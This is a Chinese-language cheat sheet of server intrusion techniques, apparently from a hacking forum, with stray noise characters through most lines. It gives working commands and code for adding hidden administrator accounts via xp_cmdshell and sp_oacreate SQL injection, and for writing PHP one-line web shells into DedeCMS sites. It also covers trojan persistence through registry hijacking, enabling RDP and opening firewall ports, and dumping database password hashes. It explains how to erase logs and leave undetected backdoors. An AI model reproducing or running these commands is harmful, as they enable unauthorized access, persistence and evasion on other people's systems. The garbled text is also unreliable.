' f* }9 H' p7 H8 J# t1.net user administrator /passwordreq:no
( C+ c+ i# v- S( {这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
8 K' X3 E" [! G4 l$ I2.比较巧妙的建克隆号的步骤0 M T \+ F8 b& |+ Q! h0 @
先建一个user的用户; j F5 l4 k! a* c8 C
然后导出注册表。然后在计算机管理里删掉
' J& j8 K! r r! ~& c在导入,在添加为管理员组" j. n# l9 a& E. K7 P; e% W
3.查radmin密码
' p1 a" q' _3 i) Y# T5 f( Hreg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg0 _0 v2 K! U9 s1 q/ Z
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]3 H0 T" u+ q6 ?% E% g& `4 F
建立一个"services.exe"的项$ G2 g2 e- w8 ~* ]# | E& _) M ^
再在其下面建立(字符串值)) k3 ?) e6 O( [/ y7 m& ]/ W
键值为mu ma的全路径0 m; E$ {" `; B* ]) C4 s
5.runas /user:guest cmd* T7 {: A q1 d2 U- \
测试用户权限!
) {; S* g. R' E7 U H3 D6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
- L* I9 |2 @3 J* ?2 R7 t6 h7.入侵后漏洞修补、痕迹清理,后门置放:
% c- W. L! g) P基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门) ?) m: z8 F7 h* j. }; G
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c& O8 y5 }" Y5 w
# V' G: d2 N6 ~& V) ]' b0 v6 Y# ?8 c
for example
0 Q+ I' u* @ N5 H- d
7 G7 I7 k0 j4 h' Z* J7 N5 Qdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'& Y; M$ I) j. @3 V/ i! F
2 h+ `, Y6 z, N3 D& ]% J0 w
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'% c1 N# ]" r8 ~& C6 h) N$ k$ N
! ~7 d7 L/ U O4 q9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
0 U4 j9 p( _4 z# }4 K2 e! a: ~如果要启用的话就必须把他加到高级用户模式 r2 d5 ^7 P8 x ]
可以直接在注入点那里直接注入
3 A$ Y1 m. w* vid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--; O4 D: _) y! w7 n
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
- `# L& A' G! P8 I. I& h$ \/ ]或者- O/ Q1 g6 Q5 Z; B/ \( O
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'3 a8 z4 ]* G0 V/ a
来恢复cmdshell。
. I2 |" H$ `, d& X
! f- e1 T5 b3 R( G% m3 Y* i分析器8 ~( n/ H; j+ @: C* i2 f7 p( H8 g
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
, \" a/ Z5 z8 z" B& j) m然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
5 A; D8 I. S# e9 v10.xp_cmdshell新的恢复办法
% d- N! W! q' }( M/ i4 Dxp_cmdshell新的恢复办法
$ [. W* p7 d3 `扩展储存过程被删除以后可以有很简单的办法恢复:1 A* ~, Z4 T: } T7 C/ Z
删除5 P8 \1 S- G& J/ E0 V% z
drop procedure sp_addextendedproc9 H3 A- D/ k$ p6 |6 C8 ~
drop procedure sp_oacreate; r2 C' l, I1 F, ]. @5 M9 v/ {
exec sp_dropextendedproc 'xp_cmdshell'
; {$ i+ P+ K- t) H- i: Q# V6 K8 S/ j9 |: I h3 t
恢复
0 a5 G. Y5 w: B1 a: \; r! F+ }dbcc addextendedproc ("sp_oacreate","odsole70.dll")! C) U0 j% l+ H6 N: ~( N9 U# g
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")% w' x" @" d) M8 j2 A! N
6 f0 R" }# u* x$ l5 R( w( l2 v$ G1 y
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
! h3 G- q% S% \" y6 k! d. j
* {+ d# \( f0 |2 r. l* h) P" U, ^-----------------------------
& L! F/ u5 G6 Z% U! M$ V P
1 \' {8 ?* H# B, J0 \6 C删除扩展存储过过程xp_cmdshell的语句:. G% w2 _6 I7 {; V8 c
exec sp_dropextendedproc 'xp_cmdshell': W+ I- r% \: v- O, u/ N5 m
+ ~% w T4 }# _) C5 `9 a4 `- \恢复cmdshell的sql语句
5 R: {* T1 K% {exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
6 @# S; {! Z" ^" Q
4 ~) V9 Q9 W4 w% Y" C% L
; k M. S/ k2 \) t6 J7 w开启cmdshell的sql语句
- \3 ]2 k0 d; R4 S& a' w/ h
3 d( d. L! U' g( V: A9 wexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
3 v8 M4 ^0 S5 q6 E# O: A# a
* ]! ]0 Q+ C( w判断存储扩展是否存在
1 r, i3 a4 ]! {0 h8 Nselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'" Y& W. [4 \8 A' f( V" l" }
返回结果为1就ok; |. ]* ^0 t* g
! z# v, |8 E2 }4 s6 e9 u2 U* L' I恢复xp_cmdshell
& a0 u V9 [- t: n8 O' U$ ?% E0 ^' C; Uexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
D& B' C4 ]$ e, U' {返回结果为1就ok
1 ]; ?! v" h9 M% X& l
2 i7 h; J" p' p: ~) B E否则上传xplog7.0.dll& ?; n, I) G9 y/ q9 a4 j
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
6 @9 r6 @9 ^4 M: ?' O
/ f3 Z) s/ d& v- N堵上cmdshell的sql语句- u, G2 k- A9 H
sp_dropextendedproc "xp_cmdshel( g5 l' |; G% m& ~
-------------------------# w- E2 U3 f. X/ V+ J
清除3389的登录记录用一条系统自带的命令:
3 ]% A# [! L" n$ Q) u3 Oreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
* d( U+ a& @1 }+ Z' }+ Q2 O6 V# G4 C
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件$ W. ?$ s1 b5 _5 s5 }5 R
在 mysql里查看当前用户的权限
, ^2 u$ p! v- Ushow grants for
: g Z1 n; e8 f3 w8 W' t5 B, u7 `& Z c" p
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
2 N$ f/ c5 A0 E9 u. Z! `$ B) n
& W) Z4 F; x& T8 _1 I' {: ^4 }$ n' X3 D5 S0 ]
Create USER 'itpro'@'%' IDENTIFIED BY '123';2 y; @+ b3 i. G$ e% f4 j
- s7 I* f5 ~6 Z4 j+ g- U- U# Y$ cGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
; X% m# C1 V9 G- C' _" y/ m
" W3 |, f* U$ o& d% ^/ q9 WMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0! D$ Y3 M; V+ E7 F7 q
, T# R) \ f6 c3 U! `* B
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
2 W$ P4 b- L% [6 D: s7 B/ _8 \/ H! J5 J
搞完事记得删除脚印哟。/ k: A- ]" ]6 O/ ]! A8 z; B
' c s( w% B5 r- z% s# b
Drop USER 'itpro'@'%';' n7 o! Z+ H8 i$ W# | z
: X$ Q; P: V: }: J' K+ q5 Y( v# t
Drop DATABASE IF EXISTS `itpro` ;
+ U' O$ `2 Y3 U6 `! K, O; V6 Z1 w
当前用户获取system权限
+ B- f: j, \3 K/ jsc Create SuperCMD binPath= "cmd /K start" type= own type= interact
: @' T$ o8 P" l; P& N/ [sc start SuperCMD& y; W; f: \8 ~
程序代码
! i; e: R6 o" r1 a, V<SCRIPT LANGUAGE="VBScript">
" N% C2 `( v& n1 [5 ~) ~: `' F" tset wsnetwork=CreateObject("WSCRIPT.NETWORK")
8 R0 ~& s& D0 K& E) V! a, \os="WinNT://"&wsnetwork.ComputerName$ q/ g' {3 Q" N3 n2 e) T4 B
Set ob=GetObject(os)
' A5 t, ` ^" W- X2 WSet oe=GetObject(os&"/Administrators,group")
. e) {' f5 D$ a: q Y% x, E! f$ \5 nSet od=ob.Create("user","nosec")
$ _) X4 `! d" I* g6 K) {od.SetPassword "123456abc!@#". t) u6 I* D' J; t/ m" _5 [4 X
od.SetInfo# J! W4 S6 ]5 Z9 h
Set of=GetObject(os&"/nosec",user)
9 [. H0 R7 E6 x$ ]oe.add os&"/nosec"
' ~/ @( |4 k; o% p y' A</Script>
- N+ m' Q4 {: g* w% C<script language=javascript>window.close();</script>
$ J8 |9 b$ c5 t
) x5 B: t, b; I# h6 z
' a5 t5 ]5 k* o/ g* k. B1 o- Q/ c; G: N
% @; ]! K' }* Q3 ~突破验证码限制入后台拿shell* O% X; P& `" }# t
程序代码- [3 `0 L' Z5 _$ v9 Y- @
REGEDIT4 7 n' M. E/ g( j5 C& K* t8 g3 J
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
# v# R& |7 I9 n% s6 n"BlockXBM"=dword:00000000* b2 p' j7 _, |- n- e
0 p& `: V' U7 b4 P3 i+ O9 S0 N保存为code.reg,导入注册表,重器IE
4 H$ D0 O0 R0 c# G4 ]! e* J就可以了) L1 {9 G; V. W! j
union写马$ h9 a2 o6 K, U7 k% f5 \
程序代码
0 ]3 f) k- x+ k! O6 C9 Awww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*7 }9 J5 G& l) T& n# C+ N1 ^
. G+ k; C% B4 l应用在dedecms注射漏洞上,无后台写马
% Y: @' u7 @8 P: tdedecms后台,无文件管理器,没有outfile权限的时候
- p- I" a1 D# Z) W在插件管理-病毒扫描里& x. Y1 L4 r- O8 K# w1 x
写一句话进include/config_hand.php里9 e% V; e: [& }
程序代码
1 |9 @% w E6 T4 R- ]$ V>';?><?php @eval($_POST[cmd]);?>
8 _4 H6 u, k1 q" K+ ]% a+ R
2 a( C( ]; E8 P4 B0 S
p: q% l. [- c/ V如上格式 P7 K) e3 q5 ?
c* k$ y4 C+ x$ @' C1 D# g1 I4 N4 Z% Loracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
$ S1 w9 V3 r+ h: ]: h, N5 O* ^" u程序代码9 ^) H$ u2 j, Z# {& b4 e* P' t
select username,password from dba_users;
5 z% P, @' t4 ^1 F3 y" |0 t
; Y1 K$ X7 Y* R" C9 `
" O) r+ t5 x+ {& b( A' x1 T mmysql远程连接用户7 z4 t, L: a) @, c2 o
程序代码
/ m& m9 a4 W3 |" Z
1 t* {% B9 B9 E( q- W& I2 z/ ~Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
: J% \/ `! m6 |& r) ZGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION9 L. f) v7 r- o V- L W A/ | _9 [9 X
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0 V D5 b6 |/ L5 c/ c% ~! B( g7 V3 s
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;0 R4 [, g( B" K6 J% X
$ ?% R4 |4 Z: Y1 N( B4 \
5 c. W1 d- E/ ]
& f# }& ]" C! U0 K/ \; W9 X/ m5 y; p6 s) f+ q# H- K& p# x
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 01 j$ J1 V) ]: p6 m8 ~% D
$ [8 @3 L: e$ f* x! K2 B+ g9 j! F1.查询终端端口
/ o+ V/ U- K3 B6 y4 @' J. T* i. w- l# Y2 L( v* q6 d
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
2 k+ q# B9 n5 d8 |7 L6 }% e- w+ ? ]8 c( D
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
$ O& y) F- C; C/ |% f( jtype tsp.reg
* J, @% R% p* t r3 n5 N6 O, N/ c! h5 w- b- ?! B$ E6 x5 v9 T
2.开启XP&2003终端服务
( {7 f7 l8 n* a' s+ ~9 c W, C+ Q. F" w1 g7 A0 f& Y6 i
/ v M1 e, I. M, r4 \% Q8 VREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f7 T# |! x+ E( \- d' }/ \
4 x. |5 m6 a8 H% F
4 F9 N& T# [' a8 r$ l/ \ m* |REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
+ c2 C/ D* o+ y3 `+ R% _( G$ k$ \; a% k3 w# C- {
3.更改终端端口为20008(0x4E28)7 X6 Y' I% o9 [! }2 n2 s: [2 l
9 x: r- W; U. t: Y, n9 u2 u4 \REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
: u t( e. v2 G+ f# |' C
5 X1 W/ i1 `+ q) V, D8 X, d8 GREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f# `- I3 O( p) y+ D: z
1 S1 e; H3 p! @0 s' s5 }6 L0 b
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
0 G7 [; j1 \+ N8 ~0 l& ~; {' v8 R2 y0 B* h/ C) u, ~4 S. h: E
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f( k8 J) G, T/ w, g4 g8 o& q
, Z1 }: R* J4 J& Q, D( \- z
: o- u5 D" f; |. |2 G" s1 O; S5.开启Win2000的终端,端口为3389(需重启)
2 a( }# r: H' Y# T0 ^2 f; ^3 L3 W2 t$ q$ P3 H
echo Windows Registry Editor Version 5.00 >2000.reg
+ f5 ?1 V, b' c. n5 v9 U( k$ ]echo. >>2000.reg0 m h: g( O }8 i5 M: t" n5 v; d
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
2 O8 C" C% Y4 g3 N9 M# zecho "Enabled"="0" >>2000.reg
- z {) p' x1 a; ^echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
O4 B: e+ y5 H& y' r# Becho "ShutdownWithoutLogon"="0" >>2000.reg . A( m+ {! D% ]" J4 F& c( s8 B
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg , M( V" s* S, O3 s ?; C
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
8 ^+ ]8 `" L0 w8 E/ G* Wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg $ N% L* K) p$ a' B: ^6 }( K2 T- k
echo "TSEnabled"=dword:00000001 >>2000.reg 7 k; F, Q2 H& J7 \9 x- s5 H
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
: {/ f5 @! x: t& i" Fecho "Start"=dword:00000002 >>2000.reg
1 Q2 o, ], ]4 M7 Lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
; i8 l; ~" m) z& Y0 E7 iecho "Start"=dword:00000002 >>2000.reg
% `9 P' K" K. L: Q. ?echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg " M7 e" z, D! ]
echo "Hotkey"="1" >>2000.reg
7 X; m* M- \% G+ b4 h K0 `6 x0 eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
# X' B3 c+ v' w4 N' g- I2 Techo "ortNumber"=dword:00000D3D >>2000.reg : W# Y" C, S Z; Q1 f& L: x
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg * A7 M1 R! @' W. U6 S( b
echo "ortNumber"=dword:00000D3D >>2000.reg8 t3 Y& J& d% ~) d+ g8 w. w( O3 G
. P7 ?' J) S: O! r" S7 }6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
% v k6 I0 I3 J& c x& S7 d3 e9 E9 O! \, ], `" ~
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
" U) S( t! R4 z- \: f1 h1 G6 N7 P(set inf=InstallHinfSection DefaultInstall)6 b, U/ `# H: P4 [" F% G, H7 `3 U
echo signature=$chicago$ >> restart.inf
9 Q1 M6 k6 r: eecho [defaultinstall] >> restart.inf
8 c, {+ V0 U8 P1 Arundll32 setupapi,%inf% 1 %temp%\restart.inf: g# m& b9 W/ b) p3 f7 K4 L9 @
4 M" e! F) F- V5 E* l0 |. D6 ^ S& b1 [% }1 w
7.禁用TCP/IP端口筛选 (需重启)
: O8 q# V/ ]$ G# a3 w" V/ B8 Y6 j' ?
: F j& N# W% X* r; l& t& zREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f1 T$ K9 T* g g- m% T
$ Q$ |$ z+ e0 e3 j6 F3 M8.终端超出最大连接数时可用下面的命令来连接
' d8 t7 }& R0 J: ^/ n/ Q$ l& J9 `2 Z/ j6 M6 h9 T
mstsc /v:ip:3389 /console
0 C/ y! V4 M! z# D4 ~' ^7 U
1 J' h$ F9 I) c, E9.调整NTFS分区权限7 j" W. b) f* P- n6 F, c* s
: ~2 E- w* `: x% A( X$ rcacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
9 @- b2 W+ s' C7 p6 `9 d0 @
; l+ _& A/ |& K8 c- R4 [* a" vcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
; E a* o- P! t" P( g. ?/ g
# k: R9 ~; `6 B ~( F0 v------------------------------------------------------
" [+ X, T k3 U4 O j+ m+ ]0 R3389.vbs
# U+ G# ~" e; `- ?# DOn Error Resume Next
4 |- G+ ^2 [5 j; d7 T. e, k, pconst HKEY_LOCAL_MACHINE = &H800000023 h2 d3 `& d* v) |8 G1 j
strComputer = "."
N" }, N V1 j0 z) Y9 @Set StdOut = WScript.StdOut: f# l, ] r$ h$ g' F
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_: _2 Q/ V @0 [ _, ]. p+ N+ f; E
strComputer & "\root\default:StdRegProv"), w# U6 E2 K/ E! E. C
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
* C( ], d9 Y7 ^! T: o- ?oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath3 Q0 ?3 ~1 s" E2 g/ X: u8 b* @
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"9 R8 ]3 r. o5 E4 q; N
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
0 D8 Y, O- y0 O) D" h% ustrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"% G- D% Q' z2 a. P* F; Q3 C, f3 L
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"+ Z- Z7 S% R1 S p. q
strValueName = "fDenyTSConnections"
% b4 Q9 ^, ]3 ]3 H* P. s1 d* N0 SdwValue = 0
' h/ J! S$ l) B6 W Ooreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue8 g0 h4 s1 C6 J
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"6 |3 C* e2 a# A9 \9 I4 f( q
strValueName = "ortNumber"
i3 p R6 Z6 `* cdwValue = 33897 T5 k, q- C5 f9 {
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue. y- _& J; F! i6 I) ?. F W
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
) ?6 E' p9 {1 P. ]4 I) d: T: HstrValueName = "ortNumber"! l( q5 Q. _3 x B4 D
dwValue = 3389# Y5 u, O) F1 [$ Y$ W* c) \
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
T% Z" \! G1 I" u7 [8 ?0 G* b- vSet R = CreateObject("WScript.Shell")
2 r4 Z* g% J. z V) uR.run("Shutdown.exe -f -r -t 0")
2 k6 i0 b+ P) [0 I9 D% V p6 J! p$ O$ R% C$ N0 J: J# W7 k9 N% T
删除awgina.dll的注册表键值
, f3 `6 G; y/ u) ^- m/ k/ z0 ]程序代码
1 o3 y; Z9 ]( _
6 q# H& y; F+ z0 y, hreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
- v! H* Y4 f! D- O$ l- j7 O0 H
, H* |5 K+ `: ^/ v
, B f' f0 _( S/ D1 Q4 @
+ W5 K' [! }* v$ J0 [( _, k# e: E/ ~2 a3 n: b" F8 w# l/ c
程序代码0 @) |5 F8 d5 p" l/ q" P* q
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash% n% a2 i- w- u; E- V2 O9 t
9 A7 B4 l+ ] n+ j+ k设置为1,关闭LM Hash
3 P g' V E( J
; g/ n, }5 h- I! @数据库安全:入侵Oracle数据库常用操作命令
$ u/ c8 p- C# q$ X0 q C$ c7 z) B最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。0 q( N- J% x7 ?- f+ F6 @
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。8 l! n) A, f1 t
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
" T6 @' J, C! _3、SQL>connect / as sysdba ;(as sysoper)或- s( x, Z/ x: }
connect internal/oracle AS SYSDBA ;(scott/tiger)2 g; ~* @+ f# U- o* G& s, n. m1 j
conn sys/change_on_install as sysdba;% z$ i, A- A9 F+ i4 a* F
4、SQL>startup; 启动数据库实例
$ r/ Q: H- q, A7 U4 ^- M. G- B5、查看当前的所有数据库: select * from v$database; Y2 n3 N! R1 O- Z
select name from v$database;
* o% l3 }0 Z4 A6、desc v$databases; 查看数据库结构字段
) c( k" v0 B9 ~# A& x0 Z7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
# e' L [0 J$ H3 W9 aSQL>select * from V_$PWFILE_USERS;$ C1 _) r5 |: D3 g& R
Show user;查看当前数据库连接用户9 c5 _- H- m: V" a
8、进入test数据库:database test;
8 f# }0 x: ~: F3 X9、查看所有的数据库实例:select * from v$instance;: l: T1 {8 ?$ z$ {- R
如:ora9i# W. _) `* c4 y# I, I
10、查看当前库的所有数据表:
( r$ [ m* d3 y5 zSQL> select TABLE_NAME from all_tables;
2 l. g! r( R }+ e& R3 { K: Jselect * from all_tables;
' @+ L- u9 K, T: `1 H n, [2 d- ISQL> select table_name from all_tables where table_name like '%u%';
( H2 K! n/ u" P2 c# j6 }2 Q6 qTABLE_NAME
5 v7 i0 f$ y& q5 [2 U( z( `------------------------------. B# h @3 a9 C3 C
_default_auditing_options_
+ P; ?: O @6 R- ^! w; N( t. p11、查看表结构:desc all_tables; `3 }! V. X! O5 {
12、显示CQI.T_BBS_XUSER的所有字段结构:' h* o) Y& H8 t( s0 ]2 a
desc CQI.T_BBS_XUSER;
! n: Z4 ~; s9 R: _13、获得CQI.T_BBS_XUSER表中的记录:
& `. L: I g( Q6 ?9 @+ G/ jselect * from CQI.T_BBS_XUSER;' n0 h0 ?3 p6 @) p$ k
14、增加数据库用户:(test11/test)6 u, P3 v! C2 q% q
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;# n6 X! u& u4 R0 [& X8 @ ]
15、用户授权:0 m, X1 S2 W. |( \" \1 g# x. g8 C H* n
grant connect,resource,dba to test11;! E/ J2 `+ D% ~5 r2 ? ]
grant sysdba to test11;0 \8 t. k! n4 i" G
commit;
1 g @, N9 z$ p$ v+ g16、更改数据库用户的密码:(将sys与system的密码改为test.)) Q# ^" h, O9 }- b! @1 ^, j# [- |% I/ {
alter user sys indentified by test;3 r4 g* u: v7 R- w' W6 Y
alter user system indentified by test;
' C$ o8 A, Z6 n! M5 v9 H) U: T9 w% v
applicationContext-util.xml" e" g! K0 V0 ~! R) G1 d
applicationContext.xml# z" |( c* j9 F* O. S
struts-config.xml
5 S' {! y+ U2 t3 Mweb.xml* n1 I' \9 @: {* ]/ f4 E2 k
server.xml
/ I$ ~% t! c8 C5 y- mtomcat-users.xml3 h# F9 ^- q$ w% ~
hibernate.cfg.xml
6 p. v, M# k* L! K ~0 `database_pool_config.xml
4 R; [$ `; ]7 ~1 l7 B' C. |$ I6 C
+ [3 G( P3 ^& h; q, R, c
0 ?. t4 l( Y1 ]\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置) Z& `. r; v3 I- z5 {
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
3 U \& R! P, g" Y8 E\WEB-INF\struts-config.xml 文件目录结构5 F' p! B$ y% {
: t1 W* S: x1 n7 z& N
spring.properties 里边包含hibernate.cfg.xml的名称
, a7 C0 E2 M$ x+ s+ @3 h
" C: U' I! E/ w( a5 x4 Y( H% n& b. K; S7 \5 `( {$ v
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml: B) k( J# ~6 U+ s. s* X
/ h- \# f' P4 |
如果都找不到 那就看看class文件吧。。; f6 ?( Z( ^/ a% Q% Y: ^; d8 l" P
+ G9 b, I9 r! R1 k5 l* P
测试1:- l; z- I' V4 d0 K3 K6 t# y0 g9 l
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
3 C1 v) S( M, M$ v: K7 `: o6 ~2 p* V
测试2:5 ~# k3 F2 g, c6 o
$ c9 h! A( O$ G& u4 X0 f0 i! ^7 v0 Jcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
: `/ l' @' w& V9 C2 G! _6 h2 z+ T
% S5 y! Z4 N }; Z9 P Jdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--4 d, u* c3 [, j) l; X+ i) B
3 T6 ~; H$ U$ |$ \3 T4 ySELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1" ~' A$ i3 h& [4 X# C
" y0 i2 d- U$ K. b查看虚拟机中的共享文件:
" R3 U9 W0 d7 C3 E, k, @在虚拟机中的cmd中执行' M* q7 i' ~4 s2 z. D. |" o. X
\\.host\Shared Folders
) `# y2 r6 v2 v4 h* L! a7 r* J0 `% J* \- K7 t
cmdshell下找终端的技巧
# o& L+ @! |+ Q a# C/ P找终端:
1 d J' }( b! o第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! 4 w! {/ D9 y/ B! `- Q: M3 Y5 l: E/ P
而终端所对应的服务名为:TermService
0 N0 U2 c9 j- T2 Q* i第二步:用netstat -ano命令,列出所有端口对应的PID值!
# P% Z( w, e1 F9 j- e7 Y 找到PID值所对应的端口
) S% i8 K7 ]6 {+ g
\1 N! d$ H9 [3 |查询sql server 2005中的密码hash
- \" _5 ]+ F2 r7 ?& j/ ~SELECT password_hash FROM sys.sql_logins where name='sa', u: T/ I- o5 x, j
